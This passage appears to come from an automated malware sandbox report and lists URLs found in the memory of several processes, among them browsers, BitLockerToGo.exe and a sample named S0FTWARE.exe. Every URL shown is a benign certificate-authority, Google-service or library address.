                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                        Source: svchost.exe, 00000006.00000002.3284832870.0000028B2AE0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3039650772.0000015B47CD0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.5172346985.0000015B47CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7
                        Source: chrome.exe, 00000005.00000002.2736370265.000007C000990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2673863880.000007C000E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
                        Source: svchost.exe, 00000006.00000003.2646192989.0000028B2ACB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: chrome.exe, 00000005.00000002.2730658183.000007C000050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: S0FTWARE.exe, 00000000.00000002.2233426757.0000000001C9E000.00000008.00000001.01000000.00000003.sdmp, S0FTWARE.exe, 00000000.00000000.2022629445.0000000001C9E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                        Source: chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: chrome.exe, 00000005.00000002.2731886350.000007C0002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655043573.000007C0010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657309033.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657234258.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657272393.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657348248.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                        Source: chrome.exe, 00000005.00000002.2731886350.000007C0002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655043573.000007C0010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657309033.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657234258.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657272393.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657348248.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                        Source: chrome.exe, 00000005.00000002.2731886350.000007C0002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655043573.000007C0010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657309033.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657234258.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657272393.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657348248.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                        Source: chrome.exe, 00000005.00000002.2731886350.000007C0002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655043573.000007C0010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657309033.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657234258.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657272393.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657348248.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                        Source: chrome.exe, 00000005.00000002.2736502342.000007C0009C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                        Source: chrome.exe, 00000005.00000002.2736502342.000007C0009C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/6
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000000.3224811182.00007FF6AEAE2000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.innosetup.comD
                        Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3382859208.000000006F8DD000.00000002.00000001.01000000.00000013.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3364072487.000000001DC0D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000002.2730898591.000007C0000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                        Source: chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732518022.000007C0003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                        Source: chrome.exe, 00000005.00000002.2730658183.000007C000038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                        Source: chrome.exe, 00000005.00000003.2664334552.000007C00033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
